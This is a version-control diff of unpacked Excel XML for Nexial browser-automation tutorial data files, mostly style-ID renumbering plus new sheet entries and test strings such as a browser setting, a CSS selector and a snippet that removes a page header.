+          <bgColor theme="0" tint="-4.9989318521683403E-2"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <font>
+        <b/>
+        <i val="0"/>
+        <color theme="1"/>
+      </font>
+      <fill>
+        <patternFill>
+          <bgColor theme="0" tint="-0.14996795556505021"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <font>
+        <b/>
+        <i val="0"/>
+        <color theme="4" tint="-0.24994659260841701"/>
+      </font>
+      <fill>
+        <patternFill>
+          <bgColor theme="4" tint="0.79998168889431442"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <font>
+        <b/>
+        <i val="0"/>
+        <strike val="0"/>
+        <color theme="4" tint="-0.24994659260841701"/>
+      </font>
+      <fill>
+        <patternFill>
+          <bgColor theme="4" tint="0.59996337778862885"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <font>
+        <b val="0"/>
+        <i val="0"/>
+        <strike val="0"/>
+        <u val="none"/>
+        <color theme="1"/>
+      </font>
+      <fill>
+        <patternFill patternType="none">
+          <bgColor auto="1"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <font>
+        <b/>
+        <i/>
+        <strike val="0"/>
+        <u val="none"/>
+        <color theme="0" tint="-0.499984740745262"/>
+      </font>
+      <fill>
+        <patternFill>
+          <bgColor theme="0" tint="-4.9989318521683403E-2"/>
+        </patternFill>
+      </fill>
+    </dxf>
     <dxf>
       <font>
         <b val="0"/>
@@ -1068,7 +1421,7 @@
   <dimension ref="A1:AAA9"/>
   <sheetViews>
     <sheetView zoomScalePageLayoutView="125" workbookViewId="0">
-      <selection activeCell="A3" sqref="A3:B3"/>
+      <selection activeCell="A6" sqref="A6"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr baseColWidth="10" defaultRowHeight="17"/>
@@ -1167,21 +1520,21 @@
   </sheetData>
   <sheetProtection sheet="1" formatColumns="0" formatRows="0" insertColumns="0" insertRows="0" deleteColumns="0" deleteRows="0"/>
   <conditionalFormatting sqref="A1:A1048576">
-    <cfRule type="beginsWith" dxfId="26" priority="1" stopIfTrue="1" operator="beginsWith" text="nexial.scope.">
+    <cfRule type="beginsWith" dxfId="38" priority="1" stopIfTrue="1" operator="beginsWith" text="nexial.scope.">
       <formula>LEFT(A1,LEN("nexial.scope."))="nexial.scope."</formula>
     </cfRule>
-    <cfRule type="beginsWith" dxfId="25" priority="2" stopIfTrue="1" operator="beginsWith" text="nexial.">
+    <cfRule type="beginsWith" dxfId="37" priority="2" stopIfTrue="1" operator="beginsWith" text="nexial.">
       <formula>LEFT(A1,LEN("nexial."))="nexial."</formula>
     </cfRule>
-    <cfRule type="notContainsBlanks" dxfId="24" priority="3" stopIfTrue="1">
+    <cfRule type="notContainsBlanks" dxfId="36" priority="3" stopIfTrue="1">
       <formula>LEN(TRIM(A1))&gt;0</formula>
     </cfRule>
   </conditionalFormatting>
   <conditionalFormatting sqref="B1:B1048576">
-    <cfRule type="expression" dxfId="23" priority="4" stopIfTrue="1">
+    <cfRule type="expression" dxfId="35" priority="4" stopIfTrue="1">
       <formula>LEFT(OFFSET(INDIRECT(ADDRESS(ROW(),COLUMN())),0,-1), 13) = "sentry.scope."</formula>
     </cfRule>
-    <cfRule type="notContainsBlanks" dxfId="22" priority="5">
+    <cfRule type="notContainsBlanks" dxfId="34" priority="5">
       <formula>LEN(TRIM(B1))&gt;0</formula>
     </cfRule>
   </conditionalFormatting>
@@ -1194,9 +1547,7 @@
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="x14ac xr xr2 xr3" xr:uid="{02992098-561F-1944-A340-34CB95735B3B}">
   <dimension ref="A1:AAA34"/>
   <sheetViews>
-    <sheetView tabSelected="1" zoomScale="118" zoomScalePageLayoutView="125" workbookViewId="0">
-      <selection activeCell="A31" sqref="A31"/>
-    </sheetView>
+    <sheetView zoomScale="112" zoomScalePageLayoutView="125" workbookViewId="0"/>
   </sheetViews>
   <sheetFormatPr baseColWidth="10" defaultRowHeight="17"/>
   <cols>
@@ -1504,52 +1855,277 @@
   </sheetData>
   <sheetProtection sheet="1" formatColumns="0" formatRows="0" insertColumns="0" insertRows="0" deleteColumns="0" deleteRows="0"/>
   <conditionalFormatting sqref="A2:A23 A28:A1048576">
-    <cfRule type="beginsWith" dxfId="21" priority="18" stopIfTrue="1" operator="beginsWith" text="nexial.scope.">
+    <cfRule type="beginsWith" dxfId="33" priority="18" stopIfTrue="1" operator="beginsWith" text="nexial.scope.">
       <formula>LEFT(A2,LEN("nexial.scope."))="nexial.scope."</formula>
     </cfRule>
-    <cfRule type="beginsWith" dxfId="20" priority="19" stopIfTrue="1" operator="beginsWith" text="nexial.">
+    <cfRule type="beginsWith" dxfId="32" priority="19" stopIfTrue="1" operator="beginsWith" text="nexial.">
       <formula>LEFT(A2,LEN("nexial."))="nexial."</formula>
     </cfRule>
-    <cfRule type="notContainsBlanks" dxfId="19" priority="20" stopIfTrue="1">
+    <cfRule type="notContainsBlanks" dxfId="31" priority="20" stopIfTrue="1">
       <formula>LEN(TRIM(A2))&gt;0</formula>
     </cfRule>
   </conditionalFormatting>
   <conditionalFormatting sqref="B8:B23 B28:B1048576">
-    <cfRule type="expression" dxfId="18" priority="21" stopIfTrue="1">
+    <cfRule type="expression" dxfId="30" priority="21" stopIfTrue="1">
       <formula>LEFT(OFFSET(INDIRECT(ADDRESS(ROW(),COLUMN())),0,-1), 13) = "sentry.scope."</formula>
     </cfRule>
-    <cfRule type="notContainsBlanks" dxfId="17" priority="22">
+    <cfRule type="notContainsBlanks" dxfId="29" priority="22">
       <formula>LEN(TRIM(B8))&gt;0</formula>
     </cfRule>
   </conditionalFormatting>
   <conditionalFormatting sqref="B3:B7">
-    <cfRule type="expression" dxfId="16" priority="16" stopIfTrue="1">
+    <cfRule type="expression" dxfId="28" priority="16" stopIfTrue="1">
       <formula>LEFT(OFFSET(INDIRECT(ADDRESS(ROW(),COLUMN())),0,-1), 13) = "sentry.scope."</formula>
     </cfRule>
-    <cfRule type="notContainsBlanks" dxfId="15" priority="17">
+    <cfRule type="notContainsBlanks" dxfId="27" priority="17">
       <formula>LEN(TRIM(B3))&gt;0</formula>
     </cfRule>
   </conditionalFormatting>
   <conditionalFormatting sqref="A24:A27">
-    <cfRule type="beginsWith" dxfId="14" priority="11" stopIfTrue="1" operator="beginsWith" text="nexial.scope.">
+    <cfRule type="beginsWith" dxfId="26" priority="11" stopIfTrue="1" operator="beginsWith" text="nexial.scope.">
       <formula>LEFT(A24,LEN("nexial.scope."))="nexial.scope."</formula>
     </cfRule>
-    <cfRule type="beginsWith" dxfId="13" priority="12" stopIfTrue="1" operator="beginsWith" text="nexial.">
+    <cfRule type="beginsWith" dxfId="25" priority="12" stopIfTrue="1" operator="beginsWith" text="nexial.">
       <formula>LEFT(A24,LEN("nexial."))="nexial."</formula>
     </cfRule>
-    <cfRule type="notContainsBlanks" dxfId="12" priority="13" stopIfTrue="1">
+    <cfRule type="notContainsBlanks" dxfId="24" priority="13" stopIfTrue="1">
       <formula>LEN(TRIM(A24))&gt;0</formula>
     </cfRule>
   </conditionalFormatting>
   <conditionalFormatting sqref="B24:B27">
-    <cfRule type="expression" dxfId="11" priority="14" stopIfTrue="1">
+    <cfRule type="expression" dxfId="23" priority="14" stopIfTrue="1">
       <formula>LEFT(OFFSET(INDIRECT(ADDRESS(ROW(),COLUMN())),0,-1), 13) = "sentry.scope."</formula>
     </cfRule>
-    <cfRule type="notContainsBlanks" dxfId="10" priority="15">
+    <cfRule type="notContainsBlanks" dxfId="22" priority="15">
       <formula>LEN(TRIM(B24))&gt;0</formula>
     </cfRule>
   </conditionalFormatting>
   <conditionalFormatting sqref="A1">
+    <cfRule type="beginsWith" dxfId="21" priority="1" stopIfTrue="1" operator="beginsWith" text="nexial.scope.">
+      <formula>LEFT(A1,LEN("nexial.scope."))="nexial.scope."</formula>
+    </cfRule>
+    <cfRule type="beginsWith" dxfId="20" priority="2" stopIfTrue="1" operator="beginsWith" text="nexial.">
+      <formula>LEFT(A1,LEN("nexial."))="nexial."</formula>
+    </cfRule>
+    <cfRule type="notContainsBlanks" dxfId="19" priority="3" stopIfTrue="1">
+      <formula>LEN(TRIM(A1))&gt;0</formula>
+    </cfRule>
+  </conditionalFormatting>
+  <conditionalFormatting sqref="B1">
+    <cfRule type="expression" dxfId="18" priority="4" stopIfTrue="1">
+      <formula>LEFT(OFFSET(INDIRECT(ADDRESS(ROW(),COLUMN())),0,-1), 13) = "sentry.scope."</formula>
+    </cfRule>
+    <cfRule type="notContainsBlanks" dxfId="17" priority="5">
+      <formula>LEN(TRIM(B1))&gt;0</formula>
+    </cfRule>
+  </conditionalFormatting>
+  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
+  <pageSetup orientation="portrait" horizontalDpi="0" verticalDpi="0"/>
+</worksheet>
+</file>
+
+<file path=xl/worksheets/sheet3.xml><?xml version="1.0" encoding="utf-8"?>
+<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="x14ac xr xr2 xr3" xr:uid="{69E3D70D-EC3E-C447-9A0C-FB9A745CCD4A}">
+  <dimension ref="A1:AAA14"/>
+  <sheetViews>
+    <sheetView tabSelected="1" zoomScale="112" zoomScalePageLayoutView="125" workbookViewId="0">
+      <selection activeCell="B2" sqref="B2"/>
+    </sheetView>
+  </sheetViews>
+  <sheetFormatPr baseColWidth="10" defaultRowHeight="17"/>
+  <cols>
+    <col min="1" max="1" width="21.1640625" style="1" bestFit="1" customWidth="1" collapsed="1"/>
+    <col min="2" max="2" width="96" style="2" bestFit="1" customWidth="1" collapsed="1"/>
+    <col min="3" max="9" width="27" style="3" customWidth="1" collapsed="1"/>
+    <col min="10" max="27" width="21.1640625" style="3" customWidth="1" collapsed="1"/>
+    <col min="28" max="16384" width="10.83203125" style="3" collapsed="1"/>
+  </cols>
+  <sheetData>
+    <row r="1" spans="1:703">
+      <c r="A1" s="1" t="s">
+        <v>13</v>
+      </c>
+      <c r="B1" s="2" t="s">
+        <v>73</v>
+      </c>
+      <c r="HA1" s="6"/>
+      <c r="AAA1" s="6"/>
+    </row>
+    <row r="2" spans="1:703" ht="36">
+      <c r="A2" s="1" t="s">
+        <v>98</v>
+      </c>
+      <c r="B2" s="8" t="s">
+        <v>99</v>
+      </c>
+      <c r="HA2" s="6"/>
+      <c r="AAA2" s="6"/>
+    </row>
+    <row r="3" spans="1:703" ht="36">
+      <c r="A3" s="1" t="s">
+        <v>74</v>
+      </c>
+      <c r="B3" s="8" t="s">
+        <v>75</v>
+      </c>
+      <c r="HA3" s="6"/>
+      <c r="AAA3" s="6"/>
+    </row>
+    <row r="4" spans="1:703" ht="36">
+      <c r="A4" s="1" t="s">
+        <v>76</v>
+      </c>
+      <c r="B4" s="9" t="s">
+        <v>77</v>
+      </c>
+      <c r="HA4" s="6"/>
+      <c r="AAA4" s="6"/>
+    </row>
+    <row r="5" spans="1:703" ht="36">
+      <c r="A5" s="1" t="s">
+        <v>78</v>
+      </c>
+      <c r="B5" s="9" t="s">
+        <v>79</v>
+      </c>
+      <c r="HA5" s="6"/>
+      <c r="AAA5" s="6"/>
+    </row>
+    <row r="6" spans="1:703" ht="36">
+      <c r="A6" s="1" t="s">
+        <v>80</v>
+      </c>
+      <c r="B6" s="9" t="s">
+        <v>81</v>
+      </c>
+      <c r="HA6" s="6"/>
+      <c r="AAA6" s="6"/>
+    </row>
+    <row r="7" spans="1:703" ht="36">
+      <c r="A7" s="1" t="s">
+        <v>82</v>
+      </c>
+      <c r="B7" s="9" t="s">
+        <v>83</v>
+      </c>
+      <c r="HA7" s="6"/>
+      <c r="AAA7" s="6"/>
+    </row>
+    <row r="8" spans="1:703">
+      <c r="A8" s="1" t="s">
+        <v>84</v>
+      </c>
+      <c r="B8" s="2" t="s">
+        <v>95</v>
+      </c>
+      <c r="HA8" s="6"/>
+      <c r="AAA8" s="6"/>
+    </row>
+    <row r="9" spans="1:703">
+      <c r="A9" s="1" t="s">
+        <v>85</v>
+      </c>
+      <c r="B9" s="2" t="s">
+        <v>88</v>
+      </c>
+      <c r="HA9" s="4"/>
+      <c r="AAA9" s="5"/>
+    </row>
+    <row r="10" spans="1:703">
+      <c r="A10" s="1" t="s">
+        <v>86</v>
+      </c>
+      <c r="B10" s="2" t="s">
+        <v>89</v>
+      </c>
+      <c r="HA10" s="4"/>
+      <c r="AAA10" s="5"/>
+    </row>
+    <row r="11" spans="1:703">
+      <c r="A11" s="1" t="s">
+        <v>91</v>
+      </c>
+      <c r="B11" s="2" t="s">
+        <v>90</v>
+      </c>
+      <c r="HA11" s="4"/>
+      <c r="AAA11" s="5"/>
+    </row>
+    <row r="12" spans="1:703">
+      <c r="A12" s="1" t="s">
+        <v>87</v>
+      </c>
+      <c r="B12" s="2" t="s">
+        <v>92</v>
+      </c>
+      <c r="HA12" s="4"/>
+      <c r="AAA12" s="5"/>
+    </row>
+    <row r="13" spans="1:703">
+      <c r="A13" s="1" t="s">
+        <v>93</v>
+      </c>
+      <c r="B13" s="2" t="s">
+        <v>94</v>
+      </c>
+    </row>
+    <row r="14" spans="1:703">
+      <c r="A14" s="1" t="s">
+        <v>96</v>
+      </c>
+      <c r="B14" s="2" t="s">
+        <v>97</v>
+      </c>
+    </row>
+  </sheetData>
+  <sheetProtection formatColumns="0" formatRows="0" insertColumns="0" insertRows="0" deleteColumns="0" deleteRows="0"/>
+  <conditionalFormatting sqref="A3:A24 A29:A1048576">
+    <cfRule type="beginsWith" dxfId="16" priority="13" stopIfTrue="1" operator="beginsWith" text="nexial.scope.">
+      <formula>LEFT(A3,LEN("nexial.scope."))="nexial.scope."</formula>
+    </cfRule>
+    <cfRule type="beginsWith" dxfId="15" priority="14" stopIfTrue="1" operator="beginsWith" text="nexial.">
+      <formula>LEFT(A3,LEN("nexial."))="nexial."</formula>
+    </cfRule>
+    <cfRule type="notContainsBlanks" dxfId="14" priority="15" stopIfTrue="1">
+      <formula>LEN(TRIM(A3))&gt;0</formula>
+    </cfRule>
+  </conditionalFormatting>
+  <conditionalFormatting sqref="B9:B24 B29:B1048576">
+    <cfRule type="expression" dxfId="13" priority="16" stopIfTrue="1">
+      <formula>LEFT(OFFSET(INDIRECT(ADDRESS(ROW(),COLUMN())),0,-1), 13) = "sentry.scope."</formula>
+    </cfRule>
+    <cfRule type="notContainsBlanks" dxfId="12" priority="17">
+      <formula>LEN(TRIM(B9))&gt;0</formula>
+    </cfRule>
+  </conditionalFormatting>
+  <conditionalFormatting sqref="B4:B8">
+    <cfRule type="expression" dxfId="11" priority="11" stopIfTrue="1">
+      <formula>LEFT(OFFSET(INDIRECT(ADDRESS(ROW(),COLUMN())),0,-1), 13) = "sentry.scope."</formula>
+    </cfRule>
+    <cfRule type="notContainsBlanks" dxfId="10" priority="12">
+      <formula>LEN(TRIM(B4))&gt;0</formula>
+    </cfRule>
+  </conditionalFormatting>
+  <conditionalFormatting sqref="A25:A28">
+    <cfRule type="beginsWith" dxfId="9" priority="6" stopIfTrue="1" operator="beginsWith" text="nexial.scope.">
+      <formula>LEFT(A25,LEN("nexial.scope."))="nexial.scope."</formula>
+    </cfRule>
+    <cfRule type="beginsWith" dxfId="8" priority="7" stopIfTrue="1" operator="beginsWith" text="nexial.">
+      <formula>LEFT(A25,LEN("nexial."))="nexial."</formula>
+    </cfRule>
+    <cfRule type="notContainsBlanks" dxfId="7" priority="8" stopIfTrue="1">
+      <formula>LEN(TRIM(A25))&gt;0</formula>
+    </cfRule>
+  </conditionalFormatting>
+  <conditionalFormatting sqref="B25:B28">
+    <cfRule type="expression" dxfId="6" priority="9" stopIfTrue="1">
+      <formula>LEFT(OFFSET(INDIRECT(ADDRESS(ROW(),COLUMN())),0,-1), 13) = "sentry.scope."</formula>
+    </cfRule>
+    <cfRule type="notContainsBlanks" dxfId="5" priority="10">
+      <formula>LEN(TRIM(B25))&gt;0</formula>
+    </cfRule>
+  </conditionalFormatting>
+  <conditionalFormatting sqref="A1:A2">
     <cfRule type="beginsWith" dxfId="4" priority="1" stopIfTrue="1" operator="beginsWith" text="nexial.scope.">
       <formula>LEFT(A1,LEN("nexial.scope."))="nexial.scope."</formula>
     </cfRule>

--- a/artifact/data/web-06.data.xlsx
+++ b/artifact/data/web-06.data.xlsx
@@ -8,17 +8,18 @@
       <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="/Users/ml093043/projects/nexial/tutorials/artifact/data/"/>
     </mc:Choice>
   </mc:AlternateContent>
-  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{52677D69-CDEF-E847-9E21-85F65A1D366E}" xr6:coauthVersionLast="37" xr6:coauthVersionMax="37" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
+  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{CFA59EE1-22C2-1940-BF68-F01247168039}" xr6:coauthVersionLast="37" xr6:coauthVersionMax="37" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
   <bookViews>
-    <workbookView xWindow="0" yWindow="440" windowWidth="38780" windowHeight="10520" tabRatio="500" activeTab="2" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
+    <workbookView xWindow="0" yWindow="440" windowWidth="33600" windowHeight="11520" tabRatio="500" activeTab="3" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
   </bookViews>
   <sheets>
     <sheet name="#default" sheetId="2" r:id="rId1"/>
     <sheet name="xss-games" sheetId="3" r:id="rId2"/>
     <sheet name="js1" sheetId="4" r:id="rId3"/>
+    <sheet name="js2" sheetId="5" r:id="rId4"/>
   </sheets>
   <externalReferences>
-    <externalReference r:id="rId4"/>
+    <externalReference r:id="rId5"/>
   </externalReferences>
   <definedNames>
     <definedName name="base">'[1]#system'!$B$2:$B$24</definedName>
@@ -51,7 +52,7 @@
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="112" uniqueCount="100">
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="130" uniqueCount="107">
   <si>
     <t>true</t>
   </si>
@@ -441,14 +442,35 @@
     <t>nexial.browser</t>
   </si>
   <si>
-    <t>chrome</t>
-  </si>
-  <si>
     <t>remove superheader</t>
   </si>
   <si>
     <t>var elem = document.querySelector('#jpampsuperheader'); 
 elem.parentNode.removeChild(elem);</t>
+  </si>
+  <si>
+    <t>superhack</t>
+  </si>
+  <si>
+    <t>$(syspath|data|fullpath)/web-06.js</t>
+  </si>
+  <si>
+    <t>firefox</t>
+  </si>
+  <si>
+    <t>ul.cn--idx-2[data-vr-zone="home-top-col3"] li:nth-of-type(1)</t>
+  </si>
+  <si>
+    <t>nexial.web.pageLoadWaitMs</t>
+  </si>
+  <si>
+    <t>30000</t>
+  </si>
+  <si>
+    <t>https://nexiality.github.io/documentation/</t>
+  </si>
+  <si>
+    <t>2 guys from Entertainment Partners is taking the world of Automation by storm with Nexial - Here\'s how they did it.</t>
   </si>
 </sst>
 </file>
@@ -617,7 +639,202 @@
     <cellStyle name="Hyperlink" xfId="5" builtinId="8" hidden="1"/>
     <cellStyle name="Normal" xfId="0" builtinId="0"/>
   </cellStyles>
-  <dxfs count="39">
+  <dxfs count="54">
+    <dxf>
+      <font>
+        <b val="0"/>
+        <i val="0"/>
+        <strike val="0"/>
+        <u val="none"/>
+        <color theme="1"/>
+      </font>
+      <fill>
+        <patternFill patternType="none">
+          <bgColor auto="1"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <font>
+        <b/>
+        <i/>
+        <strike val="0"/>
+        <u val="none"/>
+        <color theme="0" tint="-0.499984740745262"/>
+      </font>
+      <fill>
+        <patternFill>
+          <bgColor theme="0" tint="-4.9989318521683403E-2"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <font>
+        <b/>
+        <i val="0"/>
+        <color theme="1"/>
+      </font>
+      <fill>
+        <patternFill>
+          <bgColor theme="0" tint="-0.14996795556505021"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <font>
+        <b/>
+        <i val="0"/>
+        <color theme="4" tint="-0.24994659260841701"/>
+      </font>
+      <fill>
+        <patternFill>
+          <bgColor theme="4" tint="0.79998168889431442"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <font>
+        <b/>
+        <i val="0"/>
+        <strike val="0"/>
+        <color theme="4" tint="-0.24994659260841701"/>
+      </font>
+      <fill>
+        <patternFill>
+          <bgColor theme="4" tint="0.59996337778862885"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <font>
+        <b val="0"/>
+        <i val="0"/>
+        <strike val="0"/>
+        <u val="none"/>
+        <color theme="1"/>
+      </font>
+      <fill>
+        <patternFill patternType="none">
+          <bgColor auto="1"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <font>
+        <b/>
+        <i/>
+        <strike val="0"/>
+        <u val="none"/>
+        <color theme="0" tint="-0.499984740745262"/>
+      </font>
+      <fill>
+        <patternFill>
+          <bgColor theme="0" tint="-4.9989318521683403E-2"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <font>
+        <b/>
+        <i val="0"/>
+        <color theme="1"/>
+      </font>
+      <fill>
+        <patternFill>
+          <bgColor theme="0" tint="-0.14996795556505021"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <font>
+        <b/>
+        <i val="0"/>
+        <color theme="4" tint="-0.24994659260841701"/>
+      </font>
+      <fill>
+        <patternFill>
+          <bgColor theme="4" tint="0.79998168889431442"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <font>
+        <b/>
+        <i val="0"/>
+        <strike val="0"/>
+        <color theme="4" tint="-0.24994659260841701"/>
+      </font>
+      <fill>
+        <patternFill>
+          <bgColor theme="4" tint="0.59996337778862885"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <font>
+        <b val="0"/>
+        <i val="0"/>
+        <strike val="0"/>
+        <u val="none"/>
+        <color theme="1"/>
+      </font>
+      <fill>
+        <patternFill patternType="none">
+          <bgColor auto="1"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <font>
+        <b/>
+        <i/>
+        <strike val="0"/>
+        <u val="none"/>
+        <color theme="0" tint="-0.499984740745262"/>
+      </font>
+      <fill>
+        <patternFill>
+          <bgColor theme="0" tint="-4.9989318521683403E-2"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <font>
+        <b/>
+        <i val="0"/>
+        <color theme="1"/>
+      </font>
+      <fill>
+        <patternFill>
+          <bgColor theme="0" tint="-0.14996795556505021"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <font>
+        <b/>
+        <i val="0"/>
+        <color theme="4" tint="-0.24994659260841701"/>
+      </font>
+      <fill>
+        <patternFill>
+          <bgColor theme="4" tint="0.79998168889431442"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <font>
+        <b/>
+        <i val="0"/>
+        <strike val="0"/>
+        <color theme="4" tint="-0.24994659260841701"/>
+      </font>
+      <fill>
+        <patternFill>
+          <bgColor theme="4" tint="0.59996337778862885"/>
+        </patternFill>
+      </fill>
+    </dxf>
     <dxf>
       <font>
         <b val="0"/>
@@ -1520,21 +1737,21 @@
   </sheetData>
   <sheetProtection sheet="1" formatColumns="0" formatRows="0" insertColumns="0" insertRows="0" deleteColumns="0" deleteRows="0"/>
   <conditionalFormatting sqref="A1:A1048576">
-    <cfRule type="beginsWith" dxfId="38" priority="1" stopIfTrue="1" operator="beginsWith" text="nexial.scope.">
+    <cfRule type="beginsWith" dxfId="53" priority="1" stopIfTrue="1" operator="beginsWith" text="nexial.scope.">
       <formula>LEFT(A1,LEN("nexial.scope."))="nexial.scope."</formula>
     </cfRule>
-    <cfRule type="beginsWith" dxfId="37" priority="2" stopIfTrue="1" operator="beginsWith" text="nexial.">
+    <cfRule type="beginsWith" dxfId="52" priority="2" stopIfTrue="1" operator="beginsWith" text="nexial.">
       <formula>LEFT(A1,LEN("nexial."))="nexial."</formula>
     </cfRule>
-    <cfRule type="notContainsBlanks" dxfId="36" priority="3" stopIfTrue="1">
+    <cfRule type="notContainsBlanks" dxfId="51" priority="3" stopIfTrue="1">
       <formula>LEN(TRIM(A1))&gt;0</formula>
     </cfRule>
   </conditionalFormatting>
   <conditionalFormatting sqref="B1:B1048576">
-    <cfRule type="expression" dxfId="35" priority="4" stopIfTrue="1">
+    <cfRule type="expression" dxfId="50" priority="4" stopIfTrue="1">
       <formula>LEFT(OFFSET(INDIRECT(ADDRESS(ROW(),COLUMN())),0,-1), 13) = "sentry.scope."</formula>
     </cfRule>
-    <cfRule type="notContainsBlanks" dxfId="34" priority="5">
+    <cfRule type="notContainsBlanks" dxfId="49" priority="5">
       <formula>LEN(TRIM(B1))&gt;0</formula>
     </cfRule>
   </conditionalFormatting>
@@ -1855,67 +2072,67 @@
   </sheetData>
   <sheetProtection sheet="1" formatColumns="0" formatRows="0" insertColumns="0" insertRows="0" deleteColumns="0" deleteRows="0"/>
   <conditionalFormatting sqref="A2:A23 A28:A1048576">
-    <cfRule type="beginsWith" dxfId="33" priority="18" stopIfTrue="1" operator="beginsWith" text="nexial.scope.">
+    <cfRule type="beginsWith" dxfId="48" priority="18" stopIfTrue="1" operator="beginsWith" text="nexial.scope.">
       <formula>LEFT(A2,LEN("nexial.scope."))="nexial.scope."</formula>
     </cfRule>
-    <cfRule type="beginsWith" dxfId="32" priority="19" stopIfTrue="1" operator="beginsWith" text="nexial.">
+    <cfRule type="beginsWith" dxfId="47" priority="19" stopIfTrue="1" operator="beginsWith" text="nexial.">
       <formula>LEFT(A2,LEN("nexial."))="nexial."</formula>
     </cfRule>
-    <cfRule type="notContainsBlanks" dxfId="31" priority="20" stopIfTrue="1">
+    <cfRule type="notContainsBlanks" dxfId="46" priority="20" stopIfTrue="1">
       <formula>LEN(TRIM(A2))&gt;0</formula>
     </cfRule>
   </conditionalFormatting>
   <conditionalFormatting sqref="B8:B23 B28:B1048576">
-    <cfRule type="expression" dxfId="30" priority="21" stopIfTrue="1">
+    <cfRule type="expression" dxfId="45" priority="21" stopIfTrue="1">
       <formula>LEFT(OFFSET(INDIRECT(ADDRESS(ROW(),COLUMN())),0,-1), 13) = "sentry.scope."</formula>
     </cfRule>
-    <cfRule type="notContainsBlanks" dxfId="29" priority="22">
+    <cfRule type="notContainsBlanks" dxfId="44" priority="22">
       <formula>LEN(TRIM(B8))&gt;0</formula>
     </cfRule>
   </conditionalFormatting>
   <conditionalFormatting sqref="B3:B7">
-    <cfRule type="expression" dxfId="28" priority="16" stopIfTrue="1">
+    <cfRule type="expression" dxfId="43" priority="16" stopIfTrue="1">
       <formula>LEFT(OFFSET(INDIRECT(ADDRESS(ROW(),COLUMN())),0,-1), 13) = "sentry.scope."</formula>
     </cfRule>
-    <cfRule type="notContainsBlanks" dxfId="27" priority="17">
+    <cfRule type="notContainsBlanks" dxfId="42" priority="17">
       <formula>LEN(TRIM(B3))&gt;0</formula>
     </cfRule>
   </conditionalFormatting>
   <conditionalFormatting sqref="A24:A27">
-    <cfRule type="beginsWith" dxfId="26" priority="11" stopIfTrue="1" operator="beginsWith" text="nexial.scope.">
+    <cfRule type="beginsWith" dxfId="41" priority="11" stopIfTrue="1" operator="beginsWith" text="nexial.scope.">
       <formula>LEFT(A24,LEN("nexial.scope."))="nexial.scope."</formula>
     </cfRule>
-    <cfRule type="beginsWith" dxfId="25" priority="12" stopIfTrue="1" operator="beginsWith" text="nexial.">
+    <cfRule type="beginsWith" dxfId="40" priority="12" stopIfTrue="1" operator="beginsWith" text="nexial.">
       <formula>LEFT(A24,LEN("nexial."))="nexial."</formula>
     </cfRule>
-    <cfRule type="notContainsBlanks" dxfId="24" priority="13" stopIfTrue="1">
+    <cfRule type="notContainsBlanks" dxfId="39" priority="13" stopIfTrue="1">
       <formula>LEN(TRIM(A24))&gt;0</formula>
     </cfRule>
   </conditionalFormatting>
   <conditionalFormatting sqref="B24:B27">
-    <cfRule type="expression" dxfId="23" priority="14" stopIfTrue="1">
+    <cfRule type="expression" dxfId="38" priority="14" stopIfTrue="1">
       <formula>LEFT(OFFSET(INDIRECT(ADDRESS(ROW(),COLUMN())),0,-1), 13) = "sentry.scope."</formula>
     </cfRule>
-    <cfRule type="notContainsBlanks" dxfId="22" priority="15">
+    <cfRule type="notContainsBlanks" dxfId="37" priority="15">
       <formula>LEN(TRIM(B24))&gt;0</formula>
     </cfRule>
   </conditionalFormatting>
